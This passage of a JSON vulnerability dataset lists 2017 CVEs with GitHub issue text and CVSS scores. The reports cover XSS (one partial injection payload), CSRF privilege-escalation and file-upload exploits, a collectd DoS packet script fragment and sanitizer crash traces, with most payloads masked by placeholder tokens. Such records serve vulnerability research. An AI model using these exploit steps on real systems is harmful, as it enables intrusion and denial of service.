  13983. "description": "wallacepos \u2013 Cross Site Scripting (XSS). Product: wallacepos Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cwallacepos NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ctoken\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13985. "severity": "MEDIUM",
  13986. "baseScore": 6.1,
  13987. "impactScore": 2.7,
  13988. "exploitabilityScore": 2.8
  13989. },
  13990. {
  13991. "CVE_ID": "CVE-2017-7389",
  13992. "Issue_Url_old": "https://github.com/gunet/openeclass/issues/11",
  13993. "Issue_Url_new": "https://github.com/gunet/openeclass/issues/11",
  13994. "Repo_new": "gunet/openeclass",
  13995. "Issue_Created_At": "2017-03-28T17:54:13Z",
  13996. "description": "openeclass\u2013 Multiple Cross Site Scripting (XSS). Product: openeclass Download: URLTAG Vunlerable Version: Release NUMBERTAG and probably prior Tested Version: Release NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in \u201copeneclass APITAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13998. "severity": "MEDIUM",
  13999. "baseScore": 6.1,
  14000. "impactScore": 2.7,
  14001. "exploitabilityScore": 2.8
  14002. },
  14003. {
  14004. "CVE_ID": "CVE-2017-7390",
  14005. "Issue_Url_old": "https://github.com/andreas83/SocialNetwork/issues/84",
  14006. "Issue_Url_new": "https://github.com/andreas83/socialnetwork/issues/84",
  14007. "Repo_new": "andreas83/socialnetwork",
  14008. "Issue_Created_At": "2017-03-23T12:41:11Z",
  14009. "description": "APITAG \u2013 Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cmail\u201d HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: mail=\" /> APITAG alert NUMBERTAG APITAG <input type=\"text To FILETAG",
  14010. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14011. "severity": "MEDIUM",
  14012. "baseScore": 6.1,
  14013. "impactScore": 2.7,
  14014. "exploitabilityScore": 2.8
  14015. },
  14016. {
  14017. "CVE_ID": "CVE-2017-7391",
  14018. "Issue_Url_old": "https://github.com/dweeves/magmi-git/issues/522",
  14019. "Issue_Url_new": "https://github.com/dweeves/magmi-git/issues/522",
  14020. "Repo_new": "dweeves/magmi-git",
  14021. "Issue_Created_At": "2017-03-18T14:45:05Z",
  14022. "description": "Magmi \u2013 Cross Site Scripting (XSS). Product: Magmi Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cprefix\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  14023. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14024. "severity": "MEDIUM",
  14025. "baseScore": 6.1,
  14026. "impactScore": 2.7,
  14027. "exploitabilityScore": 2.8
  14028. },
  14029. {
  14030. "CVE_ID": "CVE-2017-7401",
  14031. "Issue_Url_old": "https://github.com/collectd/collectd/issues/2174",
  14032. "Issue_Url_new": "https://github.com/collectd/collectd/issues/2174",
  14033. "Repo_new": "collectd/collectd",
  14034. "Issue_Created_At": "2017-02-13T14:17:14Z",
  14035. "description": "Endless loop in APITAG while statement (CPU drain). Version of collectd NUMBERTAG Operating system / distribution: Linux laptop NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jan NUMBERTAG UTC NUMBERTAG APITAG Expected behavior Working as usual Actual behavior After sending this payload, collectd seems to be entering endless APITAG loop in packet_parse consuming high CPU resources, possibly crash/gets killed after a while. Tasks NUMBERTAG total NUMBERTAG running NUMBERTAG sleeping NUMBERTAG stopped NUMBERTAG zombie APITAG NUMBERTAG us NUMBERTAG sy NUMBERTAG ni NUMBERTAG id NUMBERTAG wa NUMBERTAG hi NUMBERTAG si NUMBERTAG st APITAG Mem NUMBERTAG total NUMBERTAG free NUMBERTAG used NUMBERTAG buff/cache APITAG Swap NUMBERTAG total NUMBERTAG free NUMBERTAG used NUMBERTAG avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND NUMBERTAG collectd NUMBERTAG S NUMBERTAG collectd Steps to reproduce Below is a packet, python program that crafts the packet that causes this problem. dos.py import socket UDP_IP = APITAG UDP_PORT NUMBERTAG print \"UDP target IP:\", UDP_IP print \"UDP target port:\", UDP_PORT sock = APITAG Internet APITAG UDP PATHTAG APITAG UDP_PORT))",
  14036. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  14037. "severity": "HIGH",
  14038. "baseScore": 7.5,
  14039. "impactScore": 3.6,
  14040. "exploitabilityScore": 3.9
  14041. },
  14042. {
  14043. "CVE_ID": "CVE-2017-7446",
  14044. "Issue_Url_old": "https://github.com/albandes/helpdezk/issues/2",
  14045. "Issue_Url_new": "https://github.com/albandes/helpdezk/issues/2",
  14046. "Repo_new": "albandes/helpdezk",
  14047. "Issue_Created_At": "2017-04-05T13:40:24Z",
  14048. "description": "Multiple CSRF Remote Code Execution Vulnerability on APITAG NUMBERTAG Exploit Title : CSRF Remote Code Execution Vulnerability on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author : MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Vendor Homepage : FILETAG Software Link : FILETAG Version NUMBERTAG Tested on : Windows Server NUMBERTAG Datacenter Evaluation CVSS: PATHTAG NUMBERTAG CRITICAL) I. Background: APITAG is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. APITAG can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. APITAG can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day by day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used. II. Description: Cross Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. APITAG have role for type person:_ admin NUMBERTAG user NUMBERTAG operator NUMBERTAG costumer NUMBERTAG partner NUMBERTAG group NUMBERTAG III. Exploit: \u2014> The first CSRF Target is: PATHTAG /person/\u201d APITAG Records People & Companies) The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin: ERRORTAG \u2014> The second CSRF target is: /admin/home /logos/ APITAG Config Logos) If we have minimum low privilege, we can remote code execute to make shell on module logos APITAG of Page Header, Login Page and Reports Logo). The APITAG unrestricted file extension but normally access only for admin. If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):\u2028 ERRORTAG \u2014\u2014\u2014\u2014 ERRORTAG \u2014\u2014\u2014\u2014\u2014\u2014\u2014 ERRORTAG \u2014\u2014\u2014\u2014 If you have executed and success, check your file on: URLTAG and PWN ^_^ URLTAG Refer: URLTAG URLTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  14049. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14050. "severity": "HIGH",
  14051. "baseScore": 8.8,
  14052. "impactScore": 5.9,
  14053. "exploitabilityScore": 2.8
  14054. },
  14055. {
  14056. "CVE_ID": "CVE-2017-7448",
  14057. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/86",
  14058. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/86",
  14059. "Repo_new": "dropbox/lepton",
  14060. "Issue_Created_At": "2017-03-31T16:43:13Z",
  14061. "description": "SIGFPE has been triggered when process malformed JPG file. Hello, the attachments are some samples that can cause SIGFPE that caused by devided by zero at PATHTAG This exception can cause Denial of Service of lepton. FILETAG You can reproduce it with: ./lepton FILETAG Here are the debugging info with gdb: APITAG NUMBERTAG for (int cmp NUMBERTAG cmp APITAG max_cmp_bc NUMBERTAG bc_allocated = max_cmp_bc (max_cmp_bc % APITAG NUMBERTAG if (cmp == desired_cmp) { APITAG NUMBERTAG fffdf7fde NUMBERTAG fffdf7fde NUMBERTAG ad \u25c2\u2014 test rax, ra NUMBERTAG fffdf7fde NUMBERTAG fffdf7fde NUMBERTAG fff NUMBERTAG fffdf7fdea NUMBERTAG fffdf7fdea NUMBERTAG a NUMBERTAG fffdf7fdeb NUMBERTAG fffdf7fdeb NUMBERTAG APITAG \u25c2\u2014 mov byte ptr [rsp NUMBERTAG APITAG \u25ba f NUMBERTAG b NUMBERTAG a f NUMBERTAG b NUMBERTAG a f NUMBERTAG efb setup_imginfo_jpg(bool NUMBERTAG f NUMBERTAG cc2b f NUMBERTAG dd NUMBERTAG f NUMBERTAG dd NUMBERTAG f NUMBERTAG ae f NUMBERTAG aa7 f NUMBERTAG ffff NUMBERTAG libc_start_main NUMBERTAG Program received signal SIGFPE pwndbg> p total_req_blocks NUMBERTAG pwndbg> bt NUMBERTAG b NUMBERTAG a in APITAG (memory_optimized=false, framebuffer NUMBERTAG c NUMBERTAG APITAG , desired_cmp NUMBERTAG this NUMBERTAG c NUMBERTAG APITAG ) at PATHTAG NUMBERTAG APITAG (this NUMBERTAG c NUMBERTAG APITAG , cmpinfo=..., cmpc NUMBERTAG mcuh=<optimized out>, mcuv=<optimized out>, APITAG out>) at PATHTAG NUMBERTAG efb in setup_imginfo_jpg APITAG at PATHTAG NUMBERTAG cc2b in read_jpeg APITAG APITAG out>, jpg_in NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG dd NUMBERTAG in std::function<bool APITAG const (this NUMBERTAG fffffffd9a0) at PATHTAG NUMBERTAG execute(std::function<bool ()> const&) (function=...) at PATHTAG NUMBERTAG ae in process_file (reader=reader APITAG writer=writer APITAG APITAG force_zlib0=<optimized out>) at PATHTAG NUMBERTAG aa7 in app_main (argc NUMBERTAG argv=<optimized out>) at PATHTAG NUMBERTAG ffff NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char )>, argc NUMBERTAG arg NUMBERTAG fffffffdc NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdc NUMBERTAG at PATHTAG NUMBERTAG in _start ()",
  14062. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14063. "severity": "MEDIUM",
  14064. "baseScore": 5.5,
  14065. "impactScore": 3.6,
  14066. "exploitabilityScore": 1.8
  14067. },
  14068. {
  14069. "CVE_ID": "CVE-2017-7452",
  14070. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/8",
  14071. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/8",
  14072. "Repo_new": "jsummers/imageworsener",
  14073. "Issue_Created_At": "2017-04-03T06:06:01Z",
  14074. "description": "NULL pointer dereference in iwbmp_read_info_header. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG fffaaf NUMBERTAG fb0 sp NUMBERTAG fffaaf NUMBERTAG d NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG in iwbmp_read_info_header PATHTAG NUMBERTAG in iw_read_bmp_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG fb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in iwbmp_read_info_header NUMBERTAG ABORTING testcase: URLTAG",
  14075. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14076. "severity": "MEDIUM",
  14077. "baseScore": 5.5,
  14078. "impactScore": 3.6,
  14079. "exploitabilityScore": 1.8
  14080. },
  14081. {
  14082. "CVE_ID": "CVE-2017-7453",
  14083. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/9",
  14084. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/9",
  14085. "Repo_new": "jsummers/imageworsener",
  14086. "Issue_Created_At": "2017-04-03T06:07:11Z",
  14087. "description": "NULL pointer dereference in iwgif_record_pixel. on APITAG NUMBERTAG imagew $FILE FILETAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG eb bp NUMBERTAG fff NUMBERTAG bfd4b0 sp NUMBERTAG fff NUMBERTAG bfd NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG ea in iwgif_record_pixel PATHTAG NUMBERTAG in lzw_emit_code PATHTAG NUMBERTAG ea in lzw_process_code PATHTAG NUMBERTAG dd0 in lzw_process_bytes PATHTAG NUMBERTAG d0 in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG a8b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in iwgif_record_pixel testcase: URLTAG",
  14088. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14089. "severity": "MEDIUM",
  14090. "baseScore": 5.5,
  14091. "impactScore": 3.6,
  14092. "exploitabilityScore": 1.8
  14093. },
  14094. {
  14095. "CVE_ID": "CVE-2017-7454",
  14096. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/11",
  14097. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/11",
  14098. "Repo_new": "jsummers/imageworsener",
  14099. "Issue_Created_At": "2017-04-03T06:08:23Z",
  14100. "description": "heap buffer overflow in iwgif_record_pixel. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG b bp NUMBERTAG ffe NUMBERTAG f NUMBERTAG sp NUMBERTAG ffe NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG a in iwgif_record_pixel PATHTAG NUMBERTAG in lzw_emit_code PATHTAG NUMBERTAG cc in lzw_process_code PATHTAG NUMBERTAG dd0 in lzw_process_bytes PATHTAG NUMBERTAG d0 in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG dcbcb NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e0ad6 in malloc PATHTAG NUMBERTAG b7b in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa3b0 in iw_malloc PATHTAG NUMBERTAG fa in iwgif_make_row_pointers PATHTAG NUMBERTAG fac in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG dcbcb NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in iwgif_record_pixel Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
  14101. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14102. "severity": "MEDIUM",
  14103. "baseScore": 5.5,
  14104. "impactScore": 3.6,
  14105. "exploitabilityScore": 1.8
  14106. },
  14107. {
  14108. "CVE_ID": "CVE-2017-7525",
  14109. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1599",
  14110. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1599",
  14111. "Repo_new": "fasterxml/jackson-databind",
  14112. "Issue_Created_At": "2017-04-11T12:39:46Z",
  14113. "description": "Jackson Deserializer vulnerability, can execute any code or command. Jackson Deserializer vulnerability, can execute any code or command The trigger condition of vulnerability is APITAG deserialization before the call to the APITAG method, this method allows the class name specified deserialize Java objects in the JSON string, the use of Object, Map, List and other objects, will cause the deserialization of vulnerabilities. Please refer to POC, the POC is a eclipse project under the Maven. POC command is in MAC or Windows pop up calculator POC verification of various cases list: PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG You only need to do the following code to trigger the vulnerability: APITAG mapper = new APITAG (); / / you must call the APITAG method APITAG (); APITAG (\"JSON string specified\", APITAG FILETAG",
  14114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14115. "severity": "CRITICAL",
  14116. "baseScore": 9.8,
  14117. "impactScore": 5.9,
  14118. "exploitabilityScore": 3.9
  14119. },
  14120. {
  14121. "CVE_ID": "CVE-2017-7525",
  14122. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1723",
  14123. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1723",
  14124. "Repo_new": "fasterxml/jackson-databind",
  14125. "Issue_Created_At": "2017-08-04T08:06:36Z",
  14126. "description": "CVETAG jackson databind: Deserialization vulnerability via APITAG method of APITAG There is this vulnerability ( CVETAG , CVETAG in jackson databind that allows remote code execution. I tried to check existing issues but could not find anything related. This vulnerability has been reported in NUMBERTAG as well as all pre releases of NUMBERTAG Is this actually fixed in NUMBERTAG or is there a patch release planned?",
  14127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14128. "severity": "CRITICAL",
  14129. "baseScore": 9.8,
  14130. "impactScore": 5.9,
  14131. "exploitabilityScore": 3.9
  14132. },
  14133. {
  14134. "CVE_ID": "CVE-2017-7550",
  14135. "Issue_Url_old": "https://github.com/ansible/ansible/issues/30874",
  14136. "Issue_Url_new": "https://github.com/ansible/ansible/issues/30874",
  14137. "Repo_new": "ansible/ansible",
  14138. "Issue_Created_At": "2017-09-25T19:26:18Z",
  14139. "description": "jenkins_plugin \"params\" argument is insecure. ISSUE TYPE Bug Report COMPONENT NAME PATHTAG ANSIBLE VERSION APITAG CONFIGURATION N/A OS / ENVIRONMENT N/A SUMMARY It was noticed that using the jenkins_plugin with username and password would log the password on the remote host. After some digging I discovered that in addition to the normal url_username and url_password arguments for APITAG the jenkins_plugin module also has a params argument where arbitrary ansible module arguments can be given. This parameter should go away as it circumvents all the normal argument checking, validation, and normalization. For url_password, this is bad as using param to send in the url_password instead of the specific url_password argument allows the url_password to be logged. This can be a security problem. I also found the source of the user's use of param instead of url_username and url_password: the module documentation has an example of using param that has that in it. STEPS TO FIX I am going to immediately create and merge a PR to remove the param example and replace it with using the url_username and url_password arguments directly. The params argument should also be removed (as it bypasses the no_log setting on url_password, allowing the password to be logged by mistake). Additional parameters that the module uses should be explicitly stated in the argument_spec instead. (I took a look at the module and it does not appear that params is passed directly to the jenkins server, instead, specific keys are always plucked out of the params. So there should be no problem removing params.)",
  14140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14141. "severity": "CRITICAL",
  14142. "baseScore": 9.8,
  14143. "impactScore": 5.9,
  14144. "exploitabilityScore": 3.9
  14145. },
  14146. {
  14147. "CVE_ID": "CVE-2017-7571",
  14148. "Issue_Url_old": "https://github.com/ladybirdweb/faveo-helpdesk/issues/446",
  14149. "Issue_Url_new": "https://github.com/ladybirdweb/faveo-helpdesk/issues/446",
  14150. "Repo_new": "ladybirdweb/faveo-helpdesk",
  14151. "Issue_Created_At": "2017-04-05T03:28:18Z",
  14152. "description": "CSRF Privilege Escalation APITAG of Role Agent to Admin) Vulnerability on Faveo version Community NUMBERTAG Exploit Title : CSRF Privilege Escalation APITAG of Role Agent to Admin) Vulnerability on Faveo version Community NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author : MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Vendor Homepage : FILETAG Software Link : FILETAG Version : Community NUMBERTAG Tested on : Windows Server NUMBERTAG Datacenter Evaluation CVSS PATHTAG NUMBERTAG HIGH) I. Background: Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship. II. Description: Cross Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. Faveo have roles: user APITAG access backend) agent APITAG access backend but limited) admin APITAG full access backend) III. Exploit: CSRF Target is: PATHTAG user id NUMBERTAG role is agent) We have low privilege as \u201cagent\u201d to access application, and then want to change be admin role. Make sample our script of CSRF APITAG CODETAG Before running APITAG please login your account as agent and running your html script. Yeaaah, now user id NUMBERTAG become admin privilege ^_^ Refer: URLTAG URLTAG > I attach our screenshot and script CSRF: APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  14153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  14154. "severity": "HIGH",
  14155. "baseScore": 8.0,
  14156. "impactScore": 5.9,
  14157. "exploitabilityScore": 2.1
  14158. },
  14159. {
  14160. "CVE_ID": "CVE-2017-7578",
  14161. "Issue_Url_old": "https://github.com/libming/libming/issues/68",
  14162. "Issue_Url_new": "https://github.com/libming/libming/issues/68",
  14163. "Repo_new": "libming/libming",
  14164. "Issue_Created_At": "2017-03-21T10:37:48Z",
  14165. "description": "Heap overflows in parser.c. Dear all, The following bugs were found with AFLGo, a directed version of the fuzzer AFL / APITAG Thanks also to Van Thuan Pham. This issues are related to NUMBERTAG The Libming utility listswf crashes due to a heap based buffer overflow in the function APITAG and several other functions in parser.c. APITAG flags them as invalid writes \"of size NUMBERTAG but the heap can be actually be written to multiple times (e.g., in each line of APITAG NUMBERTAG The overflows are caused by a pointer behind the bounds of a statically allocated array of structs of type SWF_GRADIENTRECORD. Sample crash inducing input: FILETAG ERRORTAG The bugs are fixed by the following patch (preventing the pointer behind the array bounds): CODETAG Best regards, Marcel Marcel B\u00f6hme Senior Research Fellow TSUNAMi Research Centre National University of Singapore",
  14166. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14167. "severity": "HIGH",
  14168. "baseScore": 7.8,
  14169. "impactScore": 5.9,
  14170. "exploitabilityScore": 1.8
  14171. },
  14172. {
  14173. "CVE_ID": "CVE-2017-7623",
  14174. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/12",
  14175. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/12",
  14176. "Repo_new": "jsummers/imageworsener",
  14177. "Issue_Created_At": "2017-04-03T06:08:47Z",
  14178. "description": "heap buffer overflow in iwmiffr_convert_row NUMBERTAG on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG daae bp NUMBERTAG ffc NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG daad in iwmiffr_convert_row NUMBERTAG PATHTAG NUMBERTAG a1c5 in iwmiff_read_pixels PATHTAG NUMBERTAG d8 in iw_read_miff_file PATHTAG NUMBERTAG be8 in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fdcb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e0c8d in calloc PATHTAG NUMBERTAG b NUMBERTAG in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa3e3 in iw_mallocz PATHTAG NUMBERTAG d NUMBERTAG in iwmiff_read_pixels PATHTAG NUMBERTAG d8 in iw_read_miff_file PATHTAG NUMBERTAG be8 in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fdcb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in iwmiffr_convert_row NUMBERTAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa 